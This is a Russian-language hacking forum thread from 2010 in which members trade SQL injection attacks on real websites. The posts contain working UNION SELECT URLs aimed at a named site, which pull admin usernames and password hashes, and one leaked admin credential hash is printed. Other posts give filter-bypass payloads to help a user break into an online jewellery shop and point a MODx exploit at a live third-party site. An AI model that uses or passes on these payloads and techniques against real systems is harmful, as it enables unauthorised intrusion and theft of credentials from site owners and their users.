Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.06.2010, 19:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Op3r
посоветуйте как вывести данные по следующим колонкам id, name, password
_http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+column_name,2+from+INFORMATION_SCH EMA.COLUMNS+where+table_name=0x41444D494E555345525 3+limit+0,4--
442393_oasisoftheseas_data.adminUsers
zach:*7BBC795B807CB505967BF8A5CEFF0945E8897D6A
Последний раз редактировалось Gorev; 16.06.2010 в 19:15..
|
|
|
16.06.2010, 20:44
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
Провел на форуме:
212520
Репутация:
1
|
|
Gorev с этого момента поподробнее, с помощью какого запроса Вы получили данные?
|
|
|
|
16.06.2010, 20:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+password,2+from+442393_oasisofthes eas_data.adminUsers
 |
|
|
|
16.06.2010, 21:06
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+concat_ws(0x3a,id,name,password),2 +from+adminUsers+--+
|
|
|
|
16.06.2010, 22:57
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247
Репутация:
1
|
|
http://www.site.com/info.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт
Forbidden
You don't have permission to access /info.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!
|
|
|
|
16.06.2010, 22:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от manerus
http://www.site.com/info.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт
Forbidden
You don't have permission to access /info.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!
стоит фильтр, попробуй так /!*union*/+/!*select*/
|
|
|
|
16.06.2010, 23:04
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Konqi
стоит фильтр, попробуй так /!*union*/+/!*select*/
or
union%0aselect
|
|
|
|
16.06.2010, 23:14
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
или
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt
|
|
|
|
16.06.2010, 23:16
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Вот нашел на хакер.ру уязвимость:
SQL-инъекция в MODx
Программа: MODx 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" сценарием manager/index.php (когда "a" установлен в "16") перед использованием в SQL запросах в manager/actions/mutate_templates.dynamic.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит: http://host/manager/index.php?id=4%27+ANY_SQL&a=16
Помогите скулю раскрутить, а то что-то не получается.
Вот пример сайта на этой CMS: http://bobsguides.com/manager/index.php?id=4&a=16 |
|
|
|
16.06.2010, 23:31
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
мэн там нету скули
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
